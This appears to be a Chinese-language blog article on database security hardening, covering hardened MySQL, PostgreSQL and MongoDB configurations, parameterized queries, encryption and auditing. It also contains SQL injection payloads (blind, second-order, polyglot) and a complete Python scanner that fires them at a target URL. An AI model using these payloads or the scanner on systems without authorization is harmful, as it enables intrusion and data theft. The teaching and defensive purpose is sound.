跳过正文
  1. 文章列表/

数据库安全加固实战:从配置审计到注入防御的工程实践

Elone Yue
作者
Elone Yue

引言:数据库——渗透攻击的终极目标
#

在每一次渗透测试和安全评估中,数据库始终是高价值目标的代名词。无论是用户凭证、交易记录、商业机密还是个人隐私数据,最终都存储在某个数据库中。根据 Verizon DBIR 2024 报告,超过 70% 的数据泄露事件涉及数据库攻击,而 SQL 注入依然是 OWASP Top 10 中最常见、破坏力最强的漏洞之一。

然而,数据库安全问题远不止 SQL 注入。配置错误、默认口令、过度授权、明文存储、缺乏审计——这些日常被忽视的配置层面问题,往往比单一漏洞造成更广泛的影响。本文将系统化地讲解数据库安全加固的工程实践,从配置审计到注入防御,从加密方案到监控体系,覆盖主流数据库的安全加固全流程。

数据库安全审计清单
#

MySQL 安全配置审计
#

MySQL 是最广泛使用的开源关系型数据库,其默认配置中存在多个安全隐患:

# mysql_secure_configuration.cnf
# 安全加固后的 MySQL 配置

[mysqld]
# === 网络连接安全 ===
# 禁用远程 root 登录 (仅监听本地)
bind-address = 127.0.0.1

# 如果必须暴露到网络,限制端口
port = 3306

# 禁用 SSL 以外的明文连接
require_secure_transport = ON

# === 认证安全 ===
# 使用强认证插件
default_authentication_plugin = caching_sha2_password

# 启用密码策略
validate_password.policy = STRONG
validate_password.length = 14
validate_password.mixed_case_count = 1
validate_password.number_count = 1
validate_password.special_char_count = 1

# === 文件操作安全 ===
# 禁用文件读写 (防止 INTO OUTFILE 攻击)
secure_file_priv = /var/lib/mysql-files/

# === 日志安全 ===
# 启用审计日志
plugin_load_add = audit_log.so
audit_log_policy = ALL
audit_log_format = JSON

# 禁用查询日志中的敏感信息
general_log = OFF
slow_query_log = ON
log_slow_admin_statements = ON

# === 权限控制 ===
# 禁用 LOCAL INFILE (防止本地文件读取)
local_infile = 0

# 限制最大连接
max_connections = 200

# === 加密 ===
# 启用 TLS 1.2+
ssl-ca = /etc/mysql/certs/ca.pem
ssl-cert = /etc/mysql/certs/server-cert.pem
ssl-key = /etc/mysql/certs/server-key.pem
tls_version = TLSv1.2,TLSv1.3

PostgreSQL 安全配置审计
#

# postgresql.conf - 安全加固配置

# === 网络连接 ===
listen_addresses = 'localhost'
port = 5432
ssl = on
ssl_cert_file = '/etc/postgresql/certs/server.crt'
ssl_key_file = '/etc/postgresql/certs/server.key'
ssl_ca_file = '/etc/postgresql/certs/ca.crt'
ssl_min_protocol_version = 'TLSv1.2'
ssl_ciphers = 'HIGH:MEDIUM:+3DES:!aNULL'

# === 认证 ===
password_encryption = 'scram-sha-256'
log_destination = 'stderr'
logging_collector = on
log_directory = 'log'
log_filename = 'postgresql-%Y-%m-%d.log'

# === 安全日志 ===
log_connections = on
log_disconnections = on
log_statement = 'ddl'              # 记录所有 DDL 语句
log_line_prefix = '%m [%p] %q%u@%d '
log_hostnames = on

# === 权限限制 ===
# 禁用不需要的扩展
shared_preload_libraries = 'pg_stat_statements'

# 限制连接
max_connections = 100
# pg_hba.conf - 精细访问控制
# TYPE  DATABASE        USER            ADDRESS                 METHOD

# 本地管理连接 - 仅限特定用户
local   postgres        dbadmin                                 peer map=admin_map

# 应用连接 - 要求 SSL + 密码
hostssl appdb           app_user        10.0.0.0/24             scram-sha-256
hostssl analytics       analytics_ro    10.0.1.0/24             scram-sha-256

# 复制连接
hostssl replication     replicator      10.0.0.10/32            scram-sha-256

# 拒绝所有其他连接
host    all             all             0.0.0.0/0               reject

MongoDB 安全配置审计
#

# mongod.conf - 安全加固配置
# MongoDB 默认安装后没有启用认证,这是一个严重的默认配置缺陷

# === 网络配置 ===
net:
  port: 27017
  bindIp: 127.0.0.1         # 仅监听本地
  maxIncomingConnections: 200
  wireObjectCheck: true      # 拒绝 BSON 无效内容
  tls:
    mode: requireTLS
    certificateKeyFile: /etc/mongo/certs/mongodb.pem
    CAFile: /etc/mongo/certs/ca.pem
    minTLSVersion: "TLS1_2"

# === 安全配置 ===
security:
  authorization: enabled           # 启用基于角色的访问控制
  javascriptEnabled: false         # 禁用 JavaScript 执行 ($where)
  enableLocalhostAuthBypass: false # 禁用本地认证绕过
  clusterAuthMode: "x509"          # 副本集认证

# === 审计 ===
auditLog:
  destination: file
  format: BSON
  path: /var/log/mongodb/audit.bson
  filter: '{ atype: { $in: [ "authCheck", "createCollection", "dropCollection" ] } }'

# === 操作限制 ===
operationProfiling:
  mode: slowOp
  slowOpThresholdMs: 100
  slowOpSampling:
    rate: 1.0

SQL 注入:从基础到高级攻击技术
#

SQL 注入的根本原因
#

SQL 注入的本质是将用户输入直接拼接到 SQL 查询字符串中,导致攻击者可以篡改查询语义:

# 漏洞代码 - 永远不要这样做
def get_user(username):
    query = f"SELECT * FROM users WHERE username = '{username}'"
    cursor.execute(query)
    return cursor.fetchone()

# 攻击者输入:
# username = "' OR '1'='1' --"
# 生成的 SQL:
# SELECT * FROM users WHERE username = '' OR '1'='1' --'
# 结果: 返回所有用户记录

高级 SQL 注入技术
#

1. 时间基盲注 (Time-based Blind Injection)
#

当应用不返回查询结果,但执行时间可以被观测时:

-- 判断数据库类型
' AND (SELECT CASE WHEN (SELECT COUNT(*) FROM pg_tables) > 0 THEN
     pg_sleep(5) ELSE pg_sleep(0) END) --

-- 逐字符爆破数据库名
' AND (SELECT CASE WHEN
     substr((SELECT current_database()), 1, 1) = 'p'
     THEN pg_sleep(5) ELSE pg_sleep(0) END) --

-- 使用条件延迟实现二分查找(高效爆破)
' AND (SELECT CASE WHEN
     ascii(substr((SELECT current_database()), 1, 1)) > 100
     THEN pg_sleep(5) ELSE pg_sleep(0) END) --

2. 二阶 SQL 注入 (Second-Order SQL Injection)
#

恶意数据先被存储,然后在后续查询中被使用:

# 阶段1: 注入恶意数据(注册时)
# 用户名被"安全"处理并存储
def register_user(username, email):
    # 使用了参数化查询,看似安全
    cursor.execute(
        "INSERT INTO users (username, email) VALUES (%s, %s)",
        (username, email)
    )

# 攻击者注册的用户名: admin'--
# 存储的数据: admin'--

# 阶段2: 恶意数据在后续查询中被使用(不安全的内部逻辑)
def change_password(username, new_password):
    # 从数据库读取用户名后直接拼接!
    stored_username = get_stored_username(username)
    query = f"UPDATE users SET password = '{new_password}' WHERE username = '{stored_username}'"
    cursor.execute(query)
    # 实际执行:
    # UPDATE users SET password = 'hacked' WHERE username = 'admin'--'
    # 结果: 管理员密码被篡改

3. 多语注入 (Polyglot Injection)
#

能够跨多种数据库引擎工作的注入载荷:

-- 适用于 MySQL + PostgreSQL + SQLite
'; SELECT CASE WHEN (SELECT 1=1) THEN 'true' ELSE 'false' END; --

-- 适用于 SQL Server + MySQL
'; IF (1=1) WAITFOR DELAY '0:0:5' --

-- 跨数据库版本信息提取
' UNION SELECT NULL,
  CASE WHEN (SELECT @@version) IS NOT NULL
    THEN (SELECT @@version)
  ELSE (SELECT version()) END --

自动化 SQL 注入检测脚本
#

#!/usr/bin/env python3
"""
SQL 注入自动化检测工具
支持多种注入类型的检测与验证
"""

import re
import time
import requests
import argparse
import logging
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlencode, urlparse, parse_qs

logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s [%(levelname)s] %(message)s'
)
logger = logging.getLogger('sqli_detector')


class SQLInjectionDetector:
    """SQL 注入检测引擎"""

    # 常见错误消息特征
    ERROR_PATTERNS = {
        'MySQL': [
            r'You have an error in your SQL syntax',
            r'Warning.*mysql_',
            r'check the manual that corresponds to your MySQL',
            r'Unknown column.*in .+field list',
            r'Column count doesn\'t match value count',
        ],
        'PostgreSQL': [
            r'ERROR:.*parse error at or near',
            r'ERROR:.*syntax error at or near',
            r'query failed:.*ERROR',
            r'pg_query.*\[\]:',
            r'Warning:.*pg_.*\(\)',
        ],
        'SQL Server': [
            r'SqlException:',
            r'Microsoft OLE DB Provider',
            r'Incorrect syntax near',
            r'Syntax error in string in query expression',
            r'Unclosed quotation mark',
        ],
        'SQLite': [
            r'SQLITE_ERROR:',
            r'near.*syntax error',
            r'SQLite3::SQLException',
            r'SQL error or missing database',
        ],
        'Oracle': [
            r'ORA-[0-9]{5}:',
            r'Oracle.*Driver',
            r'Warning:.*oci_',
        ],
    }

    # 盲注检测载荷
    BLIND_PAYLOADS = [
        # Boolean-based
        {"payload": "' AND '1'='1", "expect": "match"},
        {"payload": "' AND '1'='2", "expect": "diff"},
        {"payload": "' OR 1=1--", "expect": "match"},
        {"payload": "' AND 1=2--", "expect": "diff"},
        # Time-based
        {"payload": "' OR SLEEP(5)--", "time": 5},
        {"payload": "'; WAITFOR DELAY '0:0:5'--", "time": 5},
        {"payload": "' OR pg_sleep(5)--", "time": 5},
        # UNION-based
        {"payload": "' UNION SELECT NULL--", "error": True},
        {"payload": "' UNION SELECT NULL,NULL--", "error": True},
        {"payload": "' UNION SELECT NULL,NULL,NULL--", "error": True},
    ]

    def __init__(self, timeout: int = 30, delay_threshold: float = 4.0):
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'SecurityScanner/1.0',
        })
        self.timeout = timeout
        self.delay_threshold = delay_threshold
        self.findings: List[Dict] = []

    def detect_sqli_in_parameter(
        self,
        url: str,
        param_name: str,
        param_value: str,
        method: str = 'GET'
    ) -> List[Dict]:
        """检测单个参数的 SQL 注入漏洞"""
        findings = []

        logger.info(f"Testing parameter: {param_name} in {url}")

        # 1. 错误基注入检测
        error_result = self._test_error_based(url, param_name, param_value, method)
        if error_result:
            findings.append(error_result)

        # 2. 布尔基盲注检测
        boolean_result = self._test_boolean_based(url, param_name, param_value, method)
        if boolean_result:
            findings.append(boolean_result)

        # 3. 时间基盲注检测
        time_result = self._test_time_based(url, param_name, param_value, method)
        if time_result:
            findings.append(time_result)

        # 4. UNION 基注入检测
        union_result = self._test_union_based(url, param_name, param_value, method)
        if union_result:
            findings.append(union_result)

        return findings

    def _test_error_based(
        self, url: str, param: str, value: str, method: str
    ) -> Optional[Dict]:
        """错误基注入检测"""
        payloads = ["'", '"', "''", "' OR '1'='1'", "1' ORDER BY 1--"]

        for payload in payloads:
            test_value = f"{value}{payload}"
            response = self._make_request(url, param, test_value, method)

            if not response:
                continue

            for db_name, patterns in self.ERROR_PATTERNS.items():
                for pattern in patterns:
                    if re.search(pattern, response.text, re.IGNORECASE):
                        return {
                            'type': 'Error-Based SQL Injection',
                            'database': db_name,
                            'parameter': param,
                            'payload': payload,
                            'url': url,
                            'evidence': pattern,
                            'severity': 'CRITICAL',
                        }
        return None

    def _test_boolean_based(
        self, url: str, param: str, value: str, method: str
    ) -> Optional[Dict]:
        """布尔基盲注检测"""
        # 获取基准响应
        baseline = self._make_request(url, param, value, method)
        if not baseline:
            return None

        baseline_hash = hash(baseline.text)
        baseline_len = len(baseline.text)

        # 测试 True/False 条件
        true_payloads = [
            f"' AND '1'='1",
            f"' AND 1=1--",
            f"1' AND '1'='1",
        ]
        false_payloads = [
            f"' AND '1'='2",
            f"' AND 1=2--",
            f"1' AND '1'='0",
        ]

        true_responses = []
        false_responses = []

        for payload in true_payloads:
            resp = self._make_request(url, param, f"{value}{payload}", method)
            if resp:
                true_responses.append(len(resp.text))

        for payload in false_payloads:
            resp = self._make_request(url, param, f"{value}{payload}", method)
            if resp:
                false_responses.append(len(resp.text))

        # 分析响应差异
        if true_responses and false_responses:
            true_avg = sum(true_responses) / len(true_responses)
            false_avg = sum(false_responses) / len(false_responses)

            if abs(true_avg - false_avg) > baseline_len * 0.1:
                # True 和 False 条件产生了显著不同的响应
                return {
                    'type': 'Boolean-Based Blind SQL Injection',
                    'parameter': param,
                    'url': url,
                    'baseline_length': baseline_len,
                    'true_avg_length': true_avg,
                    'false_avg_length': false_avg,
                    'severity': 'HIGH',
                }

        return None

    def _test_time_based(
        self, url: str, param: str, value: str, method: str
    ) -> Optional[Dict]:
        """时间基盲注检测"""
        time_payloads = [
            {"payload": "' OR SLEEP(5)--", "db": "MySQL"},
            {"payload": "'; WAITFOR DELAY '0:0:5'--", "db": "SQL Server"},
            {"payload": "' OR pg_sleep(5)--", "db": "PostgreSQL"},
            {"payload": "' || dbms_pipe.receive_message(('a'),5) FROM dual--", "db": "Oracle"},
        ]

        for item in time_payloads:
            payload = item['payload']
            db = item['db']

            # 发送延迟载荷
            start_time = time.time()
            response = self._make_request(
                url, param, f"{value}{payload}", method
            )
            elapsed = time.time() - start_time

            if elapsed >= self.delay_threshold and response:
                return {
                    'type': 'Time-Based Blind SQL Injection',
                    'database': db,
                    'parameter': param,
                    'payload': payload,
                    'url': url,
                    'response_time': round(elapsed, 2),
                    'severity': 'CRITICAL',
                }

        return None

    def _test_union_based(
        self, url: str, param: str, value: str, method: str
    ) -> Optional[Dict]:
        """UNION 基注入检测"""
        union_payloads = []
        # 尝试不同列数
        for i in range(1, 20):
            columns = ','.join([f'NULL'] * i)
            union_payloads.append(f"' UNION SELECT {columns}--")

        baseline = self._make_request(url, param, value, method)
        if not baseline:
            return None

        for payload in union_payloads:
            response = self._make_request(url, param, f"{value}{payload}", method)
            if not response:
                continue

            # 检测 UNION 成功特征
            # 1. 错误消息变化
            for db_name, patterns in self.ERROR_PATTERNS.items():
                for pattern in patterns:
                    if re.search(pattern, response.text, re.IGNORECASE):
                        # 错误从语法错误变成列数不匹配
                        if 'column' in response.text.lower() or 'match' in response.text.lower():
                            return {
                                'type': 'UNION-Based SQL Injection',
                                'database': db_name,
                                'parameter': param,
                                'payload': payload,
                                'url': url,
                                'columns_tested': i,
                                'severity': 'CRITICAL',
                            }

            # 2. 响应内容显著变化
            if abs(len(response.text) - len(baseline.text)) > len(baseline.text) * 0.3:
                return {
                    'type': 'Potential UNION-Based SQL Injection',
                    'parameter': param,
                    'payload': payload,
                    'url': url,
                    'response_change': f"{len(response.text)} vs {len(baseline.text)}",
                    'severity': 'HIGH',
                }

        return None

    def _make_request(
        self, url: str, param: str, value: str, method: str
    ) -> Optional[requests.Response]:
        """发送 HTTP 请求"""
        try:
            if method.upper() == 'GET':
                return self.session.get(
                    url,
                    params={param: value},
                    timeout=self.timeout,
                    allow_redirects=False,
                )
            else:
                return self.session.post(
                    url,
                    data={param: value},
                    timeout=self.timeout,
                    allow_redirects=False,
                )
        except requests.exceptions.Timeout:
            logger.warning(f"Request timeout for {url}")
            return None
        except requests.exceptions.RequestException as e:
            logger.error(f"Request failed: {e}")
            return None

    def scan_url(self, url: str, method: str = 'GET') -> List[Dict]:
        """扫描 URL 中所有参数的 SQL 注入"""
        findings = []

        parsed = urlparse(url)
        params = parse_qs(parsed.query, keep_blank_values=True)

        if not params:
            logger.warning(f"No parameters found in URL: {url}")
            return findings

        for param_name, param_values in params.items():
            param_value = param_values[0] if param_values else ''
            param_findings = self.detect_sqli_in_parameter(
                url, param_name, param_value, method
            )
            findings.extend(param_findings)

        self.findings = findings
        return findings


# 使用示例
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='SQL Injection Detection Tool')
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    parser.add_argument('-m', '--method', default='GET', choices=['GET', 'POST'])
    args = parser.parse_args()

    detector = SQLInjectionDetector()
    results = detector.scan_url(args.url, args.method)

    if results:
        print(f"\n{'='*60}")
        print(f"SQL Injection Vulnerabilities Detected!")
        print(f"{'='*60}")
        for i, finding in enumerate(results, 1):
            print(f"\n[{i}] {finding['type']}")
            print(f"    URL: {finding['url']}")
            print(f"    Parameter: {finding['parameter']}")
            print(f"    Severity: {finding['severity']}")
            if 'payload' in finding:
                print(f"    Payload: {finding['payload']}")
            if 'database' in finding:
                print(f"    Database: {finding['database']}")
    else:
        print(f"\nNo SQL injection vulnerabilities detected.")

参数化查询——唯一可靠的防御
#

# === 防御方案:参数化查询(Prepared Statements) ===

# --- Python / psycopg2 (PostgreSQL) ---
import psycopg2

def get_user_safe(username: str) -> dict:
    conn = psycopg2.connect(dsn)
    cursor = conn.cursor()
    # 使用 %s 占位符,驱动层自动处理转义
    cursor.execute(
        "SELECT id, username, email FROM users WHERE username = %s",
        (username,)  # 参数作为元组传递
    )
    result = cursor.fetchone()
    cursor.close()
    conn.close()
    return result

# --- Python / pymysql (MySQL) ---
import pymysql

def get_user_mysql_safe(username: str) -> dict:
    conn = pymysql.connect(host='db', user='app', password='secret', database='appdb')
    cursor = conn.cursor(pymysql.cursors.DictCursor)
    cursor.execute(
        "SELECT id, username, email FROM users WHERE username = %s",
        (username,)
    )
    return cursor.fetchone()

# --- Python / SQLAlchemy (ORM) ---
from sqlalchemy import text

def get_user_sqlalchemy_safe(username: str, engine) -> dict:
    with engine.connect() as conn:
        result = conn.execute(
            text("SELECT id, username, email FROM users WHERE username = :username"),
            {"username": username}
        )
        return result.mappings().first()

# --- 动态列名怎么办? ---
# 参数化查询不能用于动态标识符(表名、列名)
# 正确做法:白名单验证
ALLOWED_COLUMNS = {'id', 'username', 'email', 'created_at', 'last_login'}

def sort_users_safe(sort_column: str) -> list:
    if sort_column not in ALLOWED_COLUMNS:
        raise ValueError(f"Invalid sort column: {sort_column}")

    # 经过白名单验证后,标识符是安全的
    query = text(f"SELECT id, username, email FROM users ORDER BY {sort_column}")
    # 但其他值仍然使用参数化
    # cursor.execute(query, params)

数据库加密实践
#

MySQL TDE(透明数据加密)配置
#

-- MySQL TDE 配置
-- 启用 InnoDB 表空间加密和 redo/undo 日志加密

-- 1. 安装密钥管理插件
INSTALL COMPONENT 'file://component_keyring_file';

-- 2. 创建加密表空间
CREATE TABLE encrypted_users (
    id INT PRIMARY KEY,
    username VARCHAR(255),
    email VARCHAR(255),
    ssn VARCHAR(11)
) ENGINE=InnoDB ENCRYPTION='Y';

-- 3. 加密现有表
ALTER TABLE users ENCRYPTION='Y';

-- 4. 验证加密状态
SELECT
    TABLE_SCHEMA,
    TABLE_NAME,
    CREATE_OPTIONS
FROM information_schema.TABLES
WHERE CREATE_OPTIONS LIKE '%ENCRYPTION%';

-- 5. 检查 redo/undo 日志加密
SELECT * FROM performance_schema.keyring_engine_status;

PostgreSQL 加密方案
#

-- PostgreSQL 数据加密方案
-- 使用 pgcrypto 扩展进行列级加密

-- 1. 安装扩展
CREATE EXTENSION IF NOT EXISTS pgcrypto;

-- 2. 加密敏感字段
CREATE TABLE secure_users (
    id SERIAL PRIMARY KEY,
    username VARCHAR(255),
    email BYTEA,                    -- 加密存储
    ssn BYTEA,                      -- 加密存储
    password_hash VARCHAR(255)      -- bcrypt/scrypt hash
);

-- 3. 插入加密数据
INSERT INTO secure_users (username, email, ssn, password_hash)
VALUES (
    'testuser',
    pgp_sym_encrypt('test@example.com', 'encryption_key_2024'),
    pgp_sym_encrypt('123-45-6789', 'encryption_key_2024'),
    crypt('P@ssw0rd!', gen_salt('bf', 12))  -- bcrypt hash
);

-- 4. 解密查询
SELECT
    username,
    pgp_sym_decrypt(email, 'encryption_key_2024') AS email,
    pgp_sym_decrypt(ssn, 'encryption_key_2024') AS ssn
FROM secure_users
WHERE username = 'testuser';

-- 5. 更好的做法:使用应用层密钥管理
-- 密钥从环境变量或 KMS 获取,不在 SQL 中硬编码

MongoDB 加密配置
#

# MongoDB 透明数据加密 (TDE)
# 在 mongod.conf 中配置

security:
  encryptionKeyFile: /etc/mongo/encryption/keyfile
  enableEncryption: true

# encryptionKeyFile 需要创建:
# openssl rand -base64 756 > /etc/mongo/encryption/keyfile
# chmod 400 /etc/mongo/encryption/keyfile
# chown mongodb:mongodb /etc/mongo/encryption/keyfile

数据库活动监控与审计
#

审计日志配置
#

-- PostgreSQL 细粒度审计
-- 使用 pgaudit 扩展

-- 在 postgresql.conf 中
shared_preload_libraries = 'pgaudit'
pgaudit.log = 'read, write, ddl, role'
pgaudit.log_catalog = off
pgaudit.log_level = info
pgaudit.log_parameter = on        -- 记录查询参数
pgaudit.log_relation = on         -- 记录表级操作

-- 审计特定表的所有访问
CREATE POLICY audit_users_policy ON users
    FOR ALL
    TO PUBLIC
    USING (true)
    WITH CHECK (true);

-- 审计角色
CREATE ROLE auditor;
GRANT pg_read_all_stats TO auditor;

Python 数据库安全审计脚本
#

#!/usr/bin/env python3
"""
数据库安全审计脚本
检查数据库配置、权限、加密和审计状态
"""

import psycopg2
import pymysql
import json
import sys
from typing import Dict, List, Any
from datetime import datetime


class DatabaseSecurityAuditor:
    """数据库安全审计器"""

    def __init__(self, db_type: str = 'postgresql'):
        self.db_type = db_type
        self.findings: List[Dict] = []

    def audit_postgresql(self, conn_string: str) -> Dict:
        """审计 PostgreSQL 数据库安全"""
        results = {
            'timestamp': datetime.utcnow().isoformat(),
            'database': 'PostgreSQL',
            'categories': {}
        }

        try:
            conn = psycopg2.connect(conn_string)
            conn.autocommit = True
            cursor = conn.cursor()

            # === 1. 密码策略审计 ===
            results['categories']['password_policy'] = self._audit_pg_passwords(cursor)

            # === 2. 权限审计 ===
            results['categories']['permissions'] = self._audit_pg_permissions(cursor)

            # === 3. 配置审计 ===
            results['categories']['configuration'] = self._audit_pg_config(cursor)

            # === 4. 审计日志审计 ===
            results['categories']['audit_logging'] = self._audit_pg_logging(cursor)

            # === 5. 加密审计 ===
            results['categories']['encryption'] = self._audit_pg_encryption(cursor)

            cursor.close()
            conn.close()

        except Exception as e:
            results['error'] = str(e)

        return results

    def _audit_pg_passwords(self, cursor) -> Dict:
        """审计密码策略"""
        findings = []

        # 检查密码强度
        cursor.execute("""
            SELECT rolname,
                   CASE WHEN rolpassword IS NULL THEN 'NO_PASSWORD'
                        WHEN rolpassword LIKE 'SCRAM-SHA-256%' THEN 'SCRAM-SHA-256'
                        ELSE 'MD5'
                   END as auth_method,
                   rolvaliduntil
            FROM pg_authid
            WHERE rolcanlogin = true
        """)

        users = cursor.fetchall()
        weak_password_count = 0

        for user in users:
            username, auth_method, valid_until = user
            if auth_method == 'MD5':
                findings.append({
                    'severity': 'HIGH',
                    'issue': f'User "{username}" uses MD5 password hashing',
                    'recommendation': 'ALTER USER ... PASSWORD with SCRAM-SHA-256'
                })
                weak_password_count += 1

            if not valid_until:
                findings.append({
                    'severity': 'MEDIUM',
                    'issue': f'User "{username}" has no password expiration',
                    'recommendation': 'Set VALID UNTIL for all user accounts'
                })

        return {
            'total_users': len(users),
            'weak_password_count': weak_password_count,
            'findings': findings
        }

    def _audit_pg_permissions(self, cursor) -> Dict:
        """审计权限配置"""
        findings = []

        # 检查超级用户
        cursor.execute("""
            SELECT rolname FROM pg_roles WHERE rolsuper = true
        """)
        superusers = cursor.fetchall()

        if len(superusers) > 1:
            findings.append({
                'severity': 'HIGH',
                'issue': f'Multiple superusers detected: {[s[0] for s in superusers]}',
                'recommendation': 'Only postgres should be superuser'
            })

        # 检查公共模式权限
        cursor.execute("""
            SELECT schemaname, tablename, grantee, privilege_type
            FROM information_schema.role_table_grants
            WHERE grantee = 'PUBLIC'
            AND privilege_type IN ('INSERT', 'UPDATE', 'DELETE')
        """)
        public_grants = cursor.fetchall()

        if public_grants:
            findings.append({
                'severity': 'CRITICAL',
                'issue': f'Public users have write permissions on {len(public_grants)} tables',
                'tables': [f"{g[0]}.{g[1]}" for g in public_grants],
                'recommendation': 'REVOKE ALL ON ... FROM PUBLIC'
            })

        # 检查默认权限
        cursor.execute("""
            SELECT defaclnamespace::regnamespace, defaclobjtype,
                   defaclacl
            FROM pg_default_acl
            WHERE defaclacl::text LIKE '%PUBLIC%'
        """)
        default_acls = cursor.fetchall()

        return {
            'superusers': [s[0] for s in superusers],
            'findings': findings
        }

    def _audit_pg_config(self, cursor) -> Dict:
        """审计数据库配置"""
        findings = []

        critical_settings = {
            'ssl': ('on', 'SSL should be enabled'),
            'password_encryption': ('scram-sha-256', 'Use SCRAM-SHA-256'),
            'log_statement': ('ddl', 'Log at least DDL statements'),
            'log_connections': ('on', 'Log connection attempts'),
            'log_disconnections': ('on', 'Log disconnection events'),
            'wal_level': ('replica', 'Enable WAL for audit trail'),
            'max_connections': (None, 'Review connection limits'),
        }

        cursor.execute("SHOW ALL;")
        all_settings = {row[0]: row[1] for row in cursor.fetchall()}

        for setting, (expected, desc) in critical_settings.items():
            actual = all_settings.get(setting, 'UNKNOWN')
            if expected and actual != expected:
                findings.append({
                    'severity': 'MEDIUM' if not expected.startswith('log') else 'LOW',
                    'setting': setting,
                    'expected': expected,
                    'actual': actual,
                    'description': desc
                })

        return {'findings': findings, 'total_issues': len(findings)}

    def _audit_pg_logging(self, cursor) -> Dict:
        """审计日志配置"""
        findings = []

        cursor.execute("""
            SELECT name, setting FROM pg_settings
            WHERE name IN (
                'logging_collector',
                'log_connections',
                'log_disconnections',
                'log_statement',
                'log_hostname',
                'pgaudit.log'
            )
        """)

        settings = dict(cursor.fetchall())

        if settings.get('logging_collector') != 'on':
            findings.append({
                'severity': 'HIGH',
                'issue': 'Log collector is not enabled',
                'recommendation': 'Set logging_collector = on'
            })

        if settings.get('log_statement', 'none') == 'none':
            findings.append({
                'severity': 'MEDIUM',
                'issue': 'No SQL statements are being logged',
                'recommendation': 'Set log_statement to at least "ddl"'
            })

        if 'pgaudit' not in str(settings):
            findings.append({
                'severity': 'LOW',
                'issue': 'pgaudit extension not configured',
                'recommendation': 'Install and configure pgaudit for detailed audit logging'
            })

        return {'findings': findings}

    def _audit_pg_encryption(self, cursor) -> Dict:
        """审计加密配置"""
        findings = []

        # 检查 pgcrypto
        cursor.execute("""
            SELECT extname FROM pg_extension WHERE extname = 'pgcrypto'
        """)
        has_pgcrypto = cursor.fetchone() is not None

        if not has_pgcrypto:
            findings.append({
                'severity': 'LOW',
                'issue': 'pgcrypto extension not installed',
                'recommendation': 'CREATE EXTENSION pgcrypto for column-level encryption'
            })

        # 检查 SSL 连接
        cursor.execute("""
            SELECT ssl FROM pg_stat_ssl WHERE pid = pg_backend_pid()
        """)
        ssl_status = cursor.fetchone()

        if ssl_status and not ssl_status[0]:
            findings.append({
                'severity': 'HIGH',
                'issue': 'Current connection is not using SSL',
                'recommendation': 'Configure ssl = on in postgresql.conf'
            })

        return {'findings': findings, 'has_pgcrypto': has_pgcrypto}


def run_audit():
    """执行数据库安全审计"""
    print("=" * 60)
    print("Database Security Audit")
    print("=" * 60)

    # PostgreSQL 审计
    pg_auditor = DatabaseSecurityAuditor('postgresql')
    results = pg_auditor.audit_postgresql(
        "host=localhost dbname=appdb user=auditor password=audit_pass"
    )

    # 统计发现
    total_findings = 0
    severity_counts = {'CRITICAL': 0, 'HIGH': 0, 'MEDIUM': 0, 'LOW': 0}

    for category, data in results.get('categories', {}).items():
        category_findings = data.get('findings', [])
        total_findings += len(category_findings)
        for finding in category_findings:
            sev = finding.get('severity', 'LOW')
            severity_counts[sev] = severity_counts.get(sev, 0) + 1

    print(f"\nTotal findings: {total_findings}")
    print(f"\nBy severity:")
    for sev, count in severity_counts.items():
        if count > 0:
            print(f"  [{sev}] {count}")

    return results


if __name__ == '__main__':
    run_audit()

Docker Compose 安全数据库部署
#

# docker-compose.security.yml
# 安全加固的数据库部署配置

version: '3.8'

services:
  # === PostgreSQL ===
  postgres:
    image: postgres:16-alpine
    container_name: secure-postgres
    restart: unless-stopped
    ports:
      - "127.0.0.1:5432:5432"  # 仅绑定 localhost
    environment:
      POSTGRES_DB: appdb
      POSTGRES_USER: app_user
      POSTGRES_PASSWORD_FILE: /run/secrets/pg_password
      POSTGRES_INITDB_ARGS: "--auth-host=scram-sha-256"
    volumes:
      - pg_data:/var/lib/postgresql/data
      - ./certs:/etc/postgresql/certs:ro
      - ./postgres/init:/docker-entrypoint-initdb.d:ro
    command: >
      postgres
      -c ssl=on
      -c ssl_cert_file=/etc/postgresql/certs/server.crt
      -c ssl_key_file=/etc/postgresql/certs/server.key
      -c ssl_ca_file=/etc/postgresql/certs/ca.crt
      -c ssl_min_protocol_version=TLSv1.2
      -c password_encryption=scram-sha-256
      -c logging_collector=on
      -c log_destination=stderr
      -c log_statement=ddl
      -c log_connections=on
      -c log_disconnections=on
      -c log_hostname=on
      -c max_connections=100
    networks:
      - app_network
    deploy:
      resources:
        limits:
          memory: 512M
          cpus: '1.0'
    healthcheck:
      test: ["CMD-SHELL", "pg_isready -U app_user"]
      interval: 10s
      timeout: 5s
      retries: 5
    security_opt:
      - no-new-privileges:true
    read_only: true
    tmpfs:
      - /tmp
      - /run/postgresql

  # === MySQL ===
  mysql:
    image: mysql:8.0
    container_name: secure-mysql
    restart: unless-stopped
    ports:
      - "127.0.0.1:3306:3306"
    environment:
      MYSQL_ROOT_PASSWORD_FILE: /run/secrets/mysql_root_password
      MYSQL_DATABASE: appdb
      MYSQL_USER: app_user
      MYSQL_PASSWORD_FILE: /run/secrets/mysql_password
    volumes:
      - mysql_data:/var/lib/mysql
      - ./mysql/conf.d:/etc/mysql/conf.d:ro
      - ./mysql/certs:/etc/mysql/certs:ro
    command: >
      --require-secure-transport=ON
      --default-authentication-plugin=caching_sha2_password
      --ssl-ca=/etc/mysql/certs/ca.pem
      --ssl-cert=/etc/mysql/certs/server-cert.pem
      --ssl-key=/etc/mysql/certs/server-key.pem
      --tls-version=TLSv1.2,TLSv1.3
      --local-infile=0
      --secure-file-priv=/var/lib/mysql-files
      --log-error=/var/log/mysql/error.log
      --general-log=0
    networks:
      - app_network
    deploy:
      resources:
        limits:
          memory: 512M
          cpus: '1.0'
    security_opt:
      - no-new-privileges:true
    healthcheck:
      test: ["CMD", "mysqladmin", "ping", "-h", "localhost"]
      interval: 10s
      timeout: 5s
      retries: 5

  # === MongoDB ===
  mongodb:
    image: mongo:7.0
    container_name: secure-mongodb
    restart: unless-stopped
    ports:
      - "127.0.0.1:27017:27017"
    environment:
      MONGO_INITDB_ROOT_USERNAME_FILE: /run/secrets/mongo_root_user
      MONGO_INITDB_ROOT_PASSWORD_FILE: /run/secrets/mongo_root_password
    volumes:
      - mongo_data:/data/db
      - ./mongo/certs:/etc/mongo/certs:ro
